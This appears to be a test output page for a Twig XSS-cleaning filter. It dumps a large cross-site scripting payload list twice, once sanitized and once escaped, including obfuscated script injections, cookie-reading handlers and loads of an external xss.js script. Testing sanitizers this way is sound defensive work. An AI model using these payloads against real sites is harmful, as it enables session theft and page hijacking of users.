contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(476)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(477)> <script>+-+-1-+-+alert(478)</script> <body/onload=&lt;!--&gt;&#10alert(479)> <script itworksinallbrowsers>/*<script* */alert(480)</script <img src ?itworksonchrome?\/onerror = alert(481) <svg><script>//&NewLine;confirm(482);</script </svg> <svg><script onlypossibleinopera:-)> alert(483) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(484)>ClickMe <script x> alert(485) </script 1=2 <div/onmouseover='alert(486)'> style="x:"> <--`<img/src=` onerror=alert(487)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(488)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(489)" onclick="alert(490)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(491)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:10:28


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    XXX <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&alert&A7&(378)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi"> X 1 1 1 XXX <xml id=(492)s" src="%(htc)s"></xml>
    x
    <xml:namespace prefix="t"> <>%( > < > <><FRAME SRC="alert(392);"></FRAMESET> <BODY > <BODY > <BODY !#$%%&()*~+-_.,:;?@[/|\]^`=alert(396)> <BGSOUND SRC="alert(401);">
    <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="alert(403);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <STYLE>li {list-style-image: url("alert(404)");}</STYLE><UL>
  • XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=alert(405);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=alert(406);"> <IFRAME SRC="alert(407);"></IFRAME>
    < > & TYPE="text/javascript" > <STYLE type="text/css">BODY{background:url("alert(416)")}</STYLE> <!--[if gte IE 4]> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=alert(419)></OBJECT> <HTML xmlns:xss><?import namespace=(493)s" implementation="%(htc)s">XSS</HTML>""","XML namespace."),("""<XML ID=(494)s"><I><IMG SRC="javas<!-- -->cript:alert(420)"></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"></BODY></HTML> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> <form id="test" /><button >X <body ><br>






































    <input autofocus>

    <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import alert(425);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&& </style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(429);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=alert(430);></embed> <embed src=%(jscript)s></embed> <frameset ></frameset> <object > <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><![CDATA[]]</xml> < href="">test1 test1 <embed width=500 height=500 code="data:text/html,"></embed> <iframe srcdoc="<iframe/srcdoc=>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >'> '';!--"= < > < > < > < > xxs link xxs link <"""><> > < > < > < > < > < > < > < src=""> perl -e 'print "";' > src=""> <

    result with twig: {{ xss.xss | escape }}:

    <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(374)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(375))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(376)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(377)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(378)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">¼script¾javascript:alert(379)¼/script¾ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(380)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(381)&gt;`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(382)&gt;> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(383) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(384)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id=(492)s" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(385)"> <a href="javascript:javascript:alert(386)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(387)&gt;"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(388)</script> <IMG SRC="javascript:javascript:alert(389);"> <IMG SRC=javascript:javascript:alert(390)> <IMG SRC=`javascript:javascript:alert(391)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(392);"></FRAMESET> <BODY ONLOAD=javascript:alert(393)> <BODY ONLOAD=javascript:javascript:alert(394)> <IMG SRC="jav ascript:javascript:alert(395);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(396)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(397)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(398);"> <IMG DYNSRC="javascript:javascript:alert(399)"> <IMG LOWSRC="javascript:javascript:alert(400)"> <BGSOUND SRC="javascript:javascript:alert(401);"> <BR SIZE="&{javascript:alert(402)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(403);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(404)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(405);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(406);"> <IFRAME SRC="javascript:javascript:alert(407);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(408)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(409)"> <DIV STYLE="background-image: url(javascript:javascript:alert(410))"> <DIV STYLE="width:expression(javascript:alert(411));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(412))"> <XSS STYLE="xss:expression(javascript:alert(413))"> <STYLE TYPE="text/javascript">javascript:alert(414);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(415)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(416)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(417);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(418);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(419)></OBJECT> <HTML xmlns:xss><?import namespace=(493)s" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID=(494)s"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(420)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(421)&lt;/SCRIPT&gt;"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(422)">X <body onscroll=javascript:alert(423)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(424)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(425);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(426)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(427);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(428);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(429);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(430);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(431)></frameset> <object onerror=javascript:javascript:alert(432)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(433);">]]</C><X></xml> <IMG SRC=&{javascript:alert(434);};> <a href="jav&#65ascript:javascript:alert(435)">test1</a> <a href="jav&#97ascript:javascript:alert(436)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(437)&amp;gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert((504)S');"> <IMG SRC=javascript:alert((505)S')> <IMG SRC=JaVaScRiPt:alert((506)S')> <IMG SRC=javascript:alert((495)S")> <IMG SRC=`javascript:alert("RSnake says, (507)S'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert((496)S")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert((508)S');"> <IMG SRC="jav&#x09;ascript:alert((509)S');"> <IMG SRC="jav&#x0A;ascript:alert((510)S');"> <IMG SRC="jav&#x0D;ascript:alert((511)S');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert((512)S');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert((497)S")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert((498)S");//<</SCRIPT>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:09:50


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    alert(0); alert(2); alert(4); alert(6);<\x3Cscript>alert(7)<\x00script>alert(8) <audio ></audio> <video ></video> <body src=1 href=1 ></body> <object src=1 href=1 ></object> </svg > <title title ></title > <iframe iframe ></iframe > <body body ></body > <body body ></body > <frameset frameset ></frameset > <html html ></html > <body body ></body > <svg svg ></svg > <body body ></body > <body body ></body > <body body ></body > <body body ></body > <bgsound bgsound ></bgsound > <html html ></html > <html html ></html > <style style ></style > <iframe iframe ></iframe > <body body ></body > <style style ></style > <frameset frameset ></frameset > <applet applet ></applet > <html html ></html > <html html ></html > <body body ></body > <html html ></html > <xml xml ></xml > <frameset frameset ></frameset > <applet applet ></applet > <svg svg ></svg > <html html ></html > <body body ></body > <body body ></body > <object object ></object > <body body ></body > <html html ></html > <applet applet ></applet > <body body ></body > <svg svg ></svg > <applet applet ></applet > <body body ></body > <body body ></body > <iframe iframe ></iframe > <body body ></body > <html html ></html > <object onbeforeload object ></object onbeforeload> <body body ></body > <body body ></body > <body body ></body > <iframe onbeforeload iframe ></iframe onbeforeload> <iframe src iframe src="alert(70)"></iframe src> <svg svg ></svg > <html html ></html > <body body ></body > \x3Cscript>alert(74) alert(77) --&> < > --&> < > --&> < > --&"'> < href="" id="fuzzelement1">test "'`>

    <svg></p> test test test test test test test test test test test test test test <style></style\x3E</style> <style></style\x0D</style> <style></style\x09</style> <style></style\x20</style> <style></style\x0A</style> "'`>ABC

    DEF "'`>ABC
    DEF '`"><\x3Cscript>alert(114)<\x00script>alert(115)<\x3Cimg src=xxx:x > "'`><\x00img src=xxx:x > @import "data:,*%7bx:alert(368))%7D";</style> XXXXXX <style>*[{}@import'%(css)s?]</style>X
    XXX
    XXX <style>*{x:expression(alert(372))}</style>
    X
    X
    X
    X
    XXX
    <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

    result with twig: {{ xss.xss | escape }}:

    <script\x20type="text/javascript">javascript:alert(0);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(2);</script> <script\x09type="text/javascript">javascript:alert(3);</script> <script\x0Ctype="text/javascript">javascript:alert(4);</script> <script\x2Ftype="text/javascript">javascript:alert(5);</script> <script\x0Atype="text/javascript">javascript:alert(6);</script> '`"><\x3Cscript>javascript:alert(7)</script> '`"><\x00script>javascript:alert(8)</script> <img src=1 href=1 onerror="javascript:alert(9)"></img> <audio src=1 href=1 onerror="javascript:alert(10)"></audio> <video src=1 href=1 onerror="javascript:alert(11)"></video> <body src=1 href=1 onerror="javascript:alert(12)"></body> <image src=1 href=1 onerror="javascript:alert(13)"></image> <object src=1 href=1 onerror="javascript:alert(14)"></object> <script src=1 href=1 onerror="javascript:alert(15)"></script> <svg onResize svg onResize="javascript:javascript:alert(16)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(17)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(18)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(19)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(20)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(21)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(22)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(23)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(24)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(25)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(26)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(27)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(28)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(29)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(30)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(31)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(32)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(33)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(34)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(35)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(36)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(37)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(38)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(39)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(40)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(41)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(42)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(43)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(44)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(45)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(46)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(47)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(48)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(49)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(50)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(51)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(52)"></body onResize> <object onError object onError="javascript:javascript:alert(53)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(54)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(55)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(56)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(57)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(58)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(59)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(60)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(61)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(62)"></iframe onload> <body onload body onload="javascript:javascript:alert(63)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(64)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(65)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(66)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(67)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(68)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(69)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(70)"></iframe src> <svg onload svg onload="javascript:javascript:alert(71)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(72)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(73)"></body onblur> \x3Cscript>javascript:alert(74)</script> '"`><script>/* *\x2Fjavascript:alert(75)// */</script> <script>javascript:alert(76)</script\x0D <script>javascript:alert(77)</script\x0A <script>javascript:alert(78)</script\x0B <script charset="\x22>javascript:alert(79)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(80)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(81)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(82)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(83)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(84)> --> `"'><img src='#\x27 onerror=javascript:alert(85)> <a href="javascript\x3Ajavascript:alert(86)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(87)//';</script></p> <a href="javas\x00cript:javascript:alert(88)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(89)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(90)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(91)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(92)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(93)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(94)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(95)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(96)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(97)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(98)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(99)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(100)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(101)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(102)// */</script> <script>/* *\x00/javascript:alert(103)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(104)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(105)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(106)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(107)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(108)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(109);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(110);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(111);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(112);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(113);}</script> '`"><\x3Cscript>javascript:alert(114)</script> '`"><\x00script>javascript:alert(115)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(116)> "'`><\x00img src=xxx:x onerror=javascript:alert(117)> <script src="data:text/plain\x2Cjavascript:alert(118)"></script> <script src="data:\xD4\x8F,javascript:alert(119)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(120)"></script> <script src="data:\xCB\x8F,javascript:alert(121)"></script> <script\x20type="text/javascript">javascript:alert(122);</script> <script\x3Etype="text/javascript">javascript:alert(123);</script> <script\x0Dtype="text/javascript">javascript:alert(124);</script> <script\x09type="text/javascript">javascript:alert(125);</script> <script\x0Ctype="text/javascript">javascript:alert(126);</script> <script\x2Ftype="text/javascript">javascript:alert(127);</script> <script\x0Atype="text/javascript">javascript:alert(128);</script> ABC<div style="x\x3Aexpression(javascript:alert(129)">DEF ABC<div style="x:expression\x5C(javascript:alert(130)">DEF ABC<div style="x:expression\x00(javascript:alert(131)">DEF ABC<div style="x:exp\x00ression(javascript:alert(132)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(133)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(134)">DEF ABC<div style="x:\x09expression(javascript:alert(135)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(136)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(137)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(138)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(139)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(140)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(141)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(142)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(143)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(144)">DEF ABC<div style="x:\x20expression(javascript:alert(145)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(146)">DEF ABC<div style="x:\x00expression(javascript:alert(147)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(148)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(149)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(150)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(151)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(152)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(153)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(154)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(155)">DEF <a href="\x0Bjavascript:javascript:alert(156)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(157)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(158)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(159)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(160)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(161)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(162)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(163)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(164)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(165)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(166)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(167)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(168)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(169)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(170)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(171)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(172)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(173)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(174)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(175)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(176)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(177)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(178)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(179)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(180)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(181)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(182)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(183)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(184)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(185)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(186)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(187)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(188)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(189)" id="fuzzelement1">test</a> <a 